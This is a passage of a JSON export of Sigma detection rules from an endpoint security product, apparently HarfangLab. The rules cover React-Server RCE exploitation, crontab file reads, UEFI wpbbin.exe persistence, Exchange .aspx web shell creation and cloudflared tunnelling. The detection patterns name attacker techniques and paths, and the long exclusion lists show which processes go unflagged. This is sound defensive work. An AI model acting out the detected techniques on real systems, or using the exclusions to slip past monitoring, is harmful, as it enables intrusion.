"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626073Z",
"creation_date": "2026-03-23T11:45:34.626075Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626080Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-053",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_potential_react_server_rce_exploitation_windows.yml",
"content": "title: Potential React-Server RCE Exploitation (Windows)\nid: 557844a6-9c5c-4790-9e5a-11e64897142a\ndescription: |\n Detects suspicious command-line related to the exploitation of the React Server vulnerability (CVE-2025-55182).\n CVE-2025-55182 is a critical React Server vulnerability that allows remote code execution through specially crafted requests sent to applications using affected React or Next.js versions.\n It is recommended to check the behavioral context around the execution of this command to determine whether it is legitimate.\nreferences:\n - https://cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-053\n - https://attack.mitre.org/techniques/T1190/\ndate: 2025/12/06\nmodified: 2026/01/05\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2025-55182\n - classification.Windows.Exploit.React2Shell\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine|contains: '\\next\\dist\\server\\lib\\start-server.js'\n\n exclusion_legitimate_subprocesses:\n CommandLine|contains:\n # Jest worker\n - '\\jest-worker\\'\n - '\\jest-worker/'\n # PostCSS\n - '\\dev\\build\\postcss.js'\n - '\\.next\\postcss.js'\n # Transform\n - '\\.next\\transform.js'\n # Node monitoring\n - 'netstat -ano | findstr /C::3000 | findstr LISTENING'\n # Git\n - 'git config --local --get remote.origin.url'\n - 'git rev-parse '\n # Webpack\n - '\\.next\\dev\\build\\webpack-loaders.js'\n - '\\.next\\webpack-loaders.js'\n # Version commands\n - '--version'\n # Node config\n - 'npm config get registry'\n # WMIC discovery\n - 'wmic process where executablepath is not null get executablepath'\n # DOD\n - '\\gc.util.DOD.back\\frontend\\src\\app\\admin'\n # Google Maps\n - '\\GoogleMapsComponents\\googleMapUtils.ts'\n - '\\GoogleMapsComponents\\GoogleMapsTabsComponent.tsx'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n - '?:\\Program Files\\cursor\\Cursor.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "557844a6-9c5c-4790-9e5a-11e64897142a",
"rule_name": "Potential React-Server RCE Exploitation (Windows)",
"rule_description": "Detects suspicious command-line related to the exploitation of the React Server vulnerability (CVE-2025-55182).\nCVE-2025-55182 is a critical React Server vulnerability that allows remote code execution through specially crafted requests sent to applications using affected React or Next.js versions.\nIt is recommended to check the behavioral context around the execution of this command to determine whether it is legitimate.\n",
"rule_creation_date": "2025-12-06",
"rule_modified_date": "2026-01-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "55ac54b8-f0a3-4f7c-8a84-9f40b35ea752",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.556759Z",
"creation_date": "2026-03-23T11:45:34.624882Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624886Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_etc_crontab_read_linux.yml",
"content": "title: Crontab-Related Files Read (Linux)\nid: 55ac54b8-f0a3-4f7c-8a84-9f40b35ea752\ndescription: |\n Detects a suspicious attempt to read \"/etc/crontab\" or other crontab-related files.\n These files contain scheduled tasks, usually run with root privileges, to help maintain the system.\n An attacker can use the list of cron jobs to inject malicious behaviour in unprotected scripts.\n It is recommended to analyze the process responsible for reading the cron files to look for malicious content or actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_path:\n - Path:\n - '/etc/crontab'\n - '/etc/cron.*/*'\n - '/var/spool/cron/root'\n - '/var/spool/cron/crontabs/*'\n - TargetPath:\n - '/etc/crontab'\n - '/etc/cron.*/*'\n - '/var/spool/cron/root'\n - '/var/spool/cron/crontabs/*'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_common:\n ProcessImage:\n - '*/sum'\n - '*/md5sum'\n - '*/sha1sum'\n - '*/sha256sum'\n - '*/lsattr'\n - '*/file'\n - '*/usr/sbin/aide'\n - '/bin/busybox'\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/usr/bin/rg'\n - '/usr/bin/rsync'\n - '/usr/local/bin/rsync'\n - '/bin/tar'\n - '/usr/bin/tar'\n - '/usr/bin/mksquashfs'\n - '/usr/bin/oscap'\n - '/usr/bin/podman'\n - '/usr/bin/clamscan'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/bin/rpm'\n - '/usr/bin/dpkg'\n - '/usr/libexec/packagekitd'\n - '/usr/bin/zip'\n - '/usr/bin/gnome-control-center'\n - '/usr/bin/sed'\n - '/usr/bin/git'\n - '/usr/bin/kdeinit5'\n\n exclusion_image:\n ProcessImage:\n - '/usr/sbin/tripwire'\n - '/opt/endpoint-agent/agent'\n - '/usr/bin/proxmox-backup-client'\n - '/usr/share/auditbeat/bin/auditbeat'\n - '/opt/olfeo/bin/sysconfig'\n - '/opt/hpud/*/.discagnt/udscan'\n - '/opt/vtom/abm/bin/bdaemon'\n - '*/ossec/bin/wazuh-syscheckd'\n - '/opt/bacula/bin/bacula-fd'\n - '/usr/local/Atempo/TimeNavigator/tina/Bin/.tina_bck.real'\n - '/opt/sentinelone/bin/sentinelone-agent'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/opt/eset/efs/lib/oaeventd'\n - '/opt/eset/efs/lib/odfeeder'\n - '/opt/microfocus/Discovery/.discagnt/udscan'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n - '/opt/ds_agent/ds_am'\n - '/opt/ds_agent/ds_agent'\n - '/opt/sysward/bin/sysward'\n - '/usr/local/sbin/proxmox-backup-client'\n - '/opt/sophos-av/engine/_/savscand.?'\n - '/opt/Tanium/TaniumClient/TaniumCX'\n - '/opt/traps/bin/pmd'\n - '/opt/puppetlabs/*/bin/ruby'\n - '/var/ossec/bin/ossec-syscheckd'\n - '/opt/cybereason/sensor/bin/cbram'\n - '/usr/local/avamar/bin/avtar.bin'\n - '/opt/forticlient/scanunit'\n - '/opt/ai-bolit/wrapper'\n - '/opt/netbackup/openv/netbackup/bin/bpcd'\n - '/opt/FortiEDRCollector/bin/FortiEDRCollector'\n - '/opt/Tanium/TaniumClient/extensions/comply/jre/bin/java'\n - '/opt/CrowdStrike/falcon-sensor-bpf*'\n - '/opt/NAI/LinuxShield/libexec/nailsd'\n\n exclusion_cron:\n - ProcessImage|endswith:\n - '/cron'\n - '/crond'\n - ProcessParentImage|endswith:\n - '/cron'\n - '/crond'\n\n exclusion_crontab:\n - ProcessImage|endswith: '/crontab'\n - ProcessParentImage|endswith: '/crontab'\n\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_dsc_host1:\n ProcessImage: '/opt/dsc/bin/dsc_host'\n ProcessCommandLine|endswith: 'PerformInventoryOOB /etc/opt/microsoft/omsagent/conf/omsagent.d/LinuxFileChangeTracking.mof'\n ProcessGrandparentImage|endswith: 'libexec/platform-python3.?'\n\n exclusion_dsc_host2:\n ProcessParentImage: '/opt/dsc/bin/dsc_host'\n ProcessCommandLine|contains: ' /opt/microsoft/omsconfig/Scripts/'\n\n exclusion_qualys:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_bladelogic:\n ProcessGrandparentImage:\n - '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n - '/opt/bladelogic/*/NSH/bin/rscd_full'\n\n exclusion_yum:\n ProcessCommandLine|contains: '/usr/bin/yum -y update'\n\n exclusion_cortex:\n ProcessImage: '/opt/traps/download/protected_payload_execution/cortex-xdr-payload'\n ProcessGrandparentImage: '/opt/traps/bin/pmd'\n\n exclusion_sap:\n ProcessGrandparentImage: '/usr/sap/hostctrl/exe/saposcol'\n\n exclusion_nautilus:\n ProcessImage: '/usr/bin/nautilus'\n\n exclusion_lynis:\n ProcessParentCommandLine:\n - '/bin/sh ./lynis audit system'\n - '/bin/sh /usr/bin/lynis audit system --cronjob'\n - '/bin/sh /usr/sbin/lynis audit system --cronjob'\n - '/bin/sh /usr/sbin/lynis --quick --no-colors*'\n\n exclusion_wazuh:\n - ProcessImage: '/var/ossec/bin/wazuh-syscheckd'\n - ProcessParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_tina:\n ProcessCommandLine:\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_sosreport:\n ProcessCommandLine|startswith:\n - '/usr/bin/python* /usr/*bin/sosreport'\n - '/usr/libexec/platform-python* /usr/sbin/sosreport '\n\n exclusion_kde_kioslave:\n ProcessImage: '/usr/lib/x86_64-linux-gnu/libexec/kf5/kioslave5'\n\n # Used by backup scripts to backup the /etc/ folder\n exclusion_tar_etc:\n ProcessImage: '/usr/bin/tar'\n ProcessCommandLine|contains:\n - ' etc '\n - ' etc/'\n - '/etc '\n - '/etc/'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_s6_supervise:\n ProcessParentCommandLine: 's6-supervise cron'\n\n exclusion_supervisord:\n ProcessParentCommandLine: '/usr/bin/python3 /usr/bin/supervisord -c /supervisord.conf'\n\n exclusion_etckeeper:\n ProcessParentCommandLine|startswith: '/bin/sh /etc/etckeeper/unclean.d/'\n\n exclusion_backup:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/usr/sbin/xivo-backup'\n\n exclusion_containers:\n - ProcessImage: '/usr/bin/dockerd'\n - ProcessAncestors|contains:\n - '/usr/bin/runc|/usr/bin/dockerd|'\n - '/usr/sbin/runc|/usr/sbin/dockerd|'\n - '/usr/sbin/runc|/usr/bin/dockerd|'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/sbin/containerd-shim-runc-v2'\n\n exclusion_snapd:\n ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - '/snap/core/*/usr/lib/snapd/snap-update-ns'\n - '/usr/lib/snapd/snap-update-ns'\n\n exclusion_aide:\n ProcessImage|endswith: '/bin/aide'\n\n exclusion_kalilab:\n - ProcessCommandLine|contains: '/var/www/kalilab/'\n - ProcessCurrentDirectory|startswith: '/var/www/kalilab/'\n\n exclusion_facter:\n ProcessCommandLine|startswith:\n - '/usr/bin/ruby /usr/bin/facter --'\n - '/usr/bin/ruby /usr/bin/puppet agent '\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_borg:\n ProcessCommandLine|startswith: '/usr/bin/python3 -sp /usr/bin/borg create '\n\n exclusion_chrootkit:\n ProcessParentCommandLine: '/bin/sh /usr/sbin/chkrootkit'\n\n exclusion_vtom:\n ProcessGrandparentImage: '/opt/vtom/abm/bin/bdaemon'\n\n exclusion_python:\n ProcessCommandLine|startswith:\n - '/usr/bin/python* /usr/bin/borg '\n - '/usr/bin/python* /usr/bin/duplicity '\n - '/usr/bin/python3 /usr/bin/unattended-upgrade'\n - '/usr/bin/python3 -s /sbin/sos report'\n\n exclusion_webmin:\n ProcessCommandLine|startswith:\n - '/usr/bin/perl /usr/share/webmin/miniserv.pl'\n - '/usr/bin/perl /usr/share/webmin/run-postinstalls.pl'\n\n exclusion_ai-bolit:\n ProcessParentImage: '/opt/ai-bolit/wrapper'\n\n exclusion_nagios:\n - ProcessParentImage: '/usr/sbin/nrpe'\n - ProcessAncestors|contains: '|/usr/sbin/nrpe|'\n - ProcessCommandLine|startswith: '/usr/bin/perl -w /usr/nagios/plugins/check_'\n\n exclusion_cfengine:\n - ProcessParentImage: '/var/cfengine/bin/cf-execd'\n - ProcessAncestors|contains: '|/var/cfengine/bin/cf-execd|'\n\n exclusion_networker:\n ProcessParentImage: '/usr/sbin/nsrexecd'\n\n exclusion_graylog:\n ProcessParentImage: '/usr/bin/graylog-sidecar'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "55ac54b8-f0a3-4f7c-8a84-9f40b35ea752",
"rule_name": "Crontab-Related Files Read (Linux)",
"rule_description": "Detects a suspicious attempt to read \"/etc/crontab\" or other crontab-related files.\nThese files contain scheduled tasks, usually run with root privileges, to help maintain the system.\nAn attacker can use the list of cron jobs to inject malicious behaviour in unprotected scripts.\nIt is recommended to analyze the process responsible for reading the cron files to look for malicious content or actions.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "55b1e22e-14ef-432e-89d5-130a2abf8726",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071803Z",
"creation_date": "2026-03-23T11:45:34.071805Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071809Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/wpbbin.html",
"https://attack.mitre.org/techniques/T1542/001/"
],
"name": "t1542_001_possible_execution_from_uefi_persistence.yml",
"content": "title: Possible UEFI Persistence Detected\nid: 55b1e22e-14ef-432e-89d5-130a2abf8726\ndescription: |\n Detects the execution of a process which image is wpbbin.exe, which can be indicative of a malicious execution from UEFI persistence.\n This binary is placed by the BIOS into System32 directory and is executed by smss.exe (Session Manager Subsystem) during OS startup.\n Malicious actors can use this feature as a persistence mechanism by putting a malicious wpbbin.exe into System32 directory that will be executed at the next startup.\n It is recommended to investigate the wpbbin.exe process to look for potential malicious actions.\nreferences:\n - https://persistence-info.github.io/Data/wpbbin.html\n - https://attack.mitre.org/techniques/T1542/001/\ndate: 2022/07/20\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1542.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\wpbbin.exe'\n\n filter_legitimate_signature:\n Signature:\n - 'Absolute Software Corp.'\n - 'ASUSTeK Computer Inc.'\n - 'GIGA-BYTE Technology Co.'\n - 'HP Inc.'\n - 'LENOVO'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "55b1e22e-14ef-432e-89d5-130a2abf8726",
"rule_name": "Possible UEFI Persistence Detected",
"rule_description": "Detects the execution of a process which image is wpbbin.exe, which can be indicative of a malicious execution from UEFI persistence.\nThis binary is placed by the BIOS into System32 directory and is executed by smss.exe (Session Manager Subsystem) during OS startup.\nMalicious actors can use this feature as a persistence mechanism by putting a malicious wpbbin.exe into System32 directory that will be executed at the next startup.\nIt is recommended to investigate the wpbbin.exe process to look for potential malicious actions.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1542.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "56320185-bef7-49c7-b8cf-e2f646e9ba86",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071523Z",
"creation_date": "2026-03-23T11:45:34.071525Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071529Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/gossithedog/status/1367168122403368962?lang=fr",
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_suspicious_aspx_creation_microsoft_exchange.yml",
"content": "title: Suspicious File Created linked to Microsoft Exchange Exploitation\nid: 56320185-bef7-49c7-b8cf-e2f646e9ba86\ndescription: |\n Detects the creation of suspicious files inside the Microsoft Exchange web server folder.\n Attackers can use these placed .aspx files as web shells, persistence or initial access.\n It is recommended to investigate the content of the created file to determine its legitimacy.\nreferences:\n - https://twitter.com/gossithedog/status/1367168122403368962?lang=fr\n - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2022/09/02\nmodified: 2025/07/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection_dir:\n TargetFilename|contains:\n - '\\inetpub\\wwwroot\\aspnet_client\\'\n - '\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\\\???\\auth\\' # owa, ecp\n\n # Legitimate files\n # This legitimate files can be modify by attackers as already seen in the wild\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\ExpiredPassword.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookCN.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\errorFE.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\frowny.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\logoff.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\logon.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\signout.aspx'\n selection_file:\n TargetFilename|endswith:\n - '.aspx'\n - '.asp'\n - '.ashx'\n\n exclusion_msiexec:\n ProcessCommandLine: '?:\\Windows\\system32\\msiexec.exe /V'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "56320185-bef7-49c7-b8cf-e2f646e9ba86",
"rule_name": "Suspicious File Created linked to Microsoft Exchange Exploitation",
"rule_description": "Detects the creation of suspicious files inside the Microsoft Exchange web server folder.\nAttackers can use these placed .aspx files as web shells, persistence or initial access.\nIt is recommended to investigate the content of the created file to determine its legitimacy.\n",
"rule_creation_date": "2022-09-02",
"rule_modified_date": "2025-07-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "568f6fdb-3564-4318-bf83-552ed6516300",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603985Z",
"creation_date": "2026-03-23T11:45:34.603988Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603996Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/cloudflare/cloudflared",
"https://blog.reconinfosec.com/emergence-of-akira-ransomware-group",
"https://attack.mitre.org/techniques/T1572/"
],
"name": "t1572_cloudfare_tunneling_cmdline.yml",
"content": "title: Cloudfared Tunneling CommandLine Detected\nid: 568f6fdb-3564-4318-bf83-552ed6516300\ndescription: |\n Detects a command-line that is associated with the Cloudfared Tunnel agent.\n Cloudfared is a tunneling daemon that proxies traffic from the Cloudfare network.\n This has been seen in use by threat actors such as Akira ransomware to tunnel into internal infrastructure.\n It is recommended to investigate the process's and daemon's network connections to determine if this activity is normal in your infrastructure.\nreferences:\n - https://github.com/cloudflare/cloudflared\n - https://blog.reconinfosec.com/emergence-of-akira-ransomware-group\n - https://attack.mitre.org/techniques/T1572/\ndate: 2023/05/11\nmodified: 2025/03/18\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1572\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Cloudflared\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Tunneling\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains:\n - \"tunnel * run --token\"\n - \"tunnel * --config * run\"\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "568f6fdb-3564-4318-bf83-552ed6516300",
"rule_name": "Cloudfared Tunneling CommandLine Detected",
"rule_description": "Detects a command-line that is associated with the Cloudfared Tunnel agent.\nCloudfared is a tunneling daemon that proxies traffic from the Cloudfare network.\nThis has been seen in use by threat actors such as Akira ransomware to tunnel into internal infrastructure.\nIt is recommended to investigate the process's and daemon's network connections to determine if this activity is normal in your infrastructure.\n",
"rule_creation_date": "2023-05-11",
"rule_modified_date": "2025-03-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "56b4092b-c97b-4030-aec7-939c18d9289c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077492Z",
"creation_date": "2026-03-23T11:45:34.077494Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077498Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
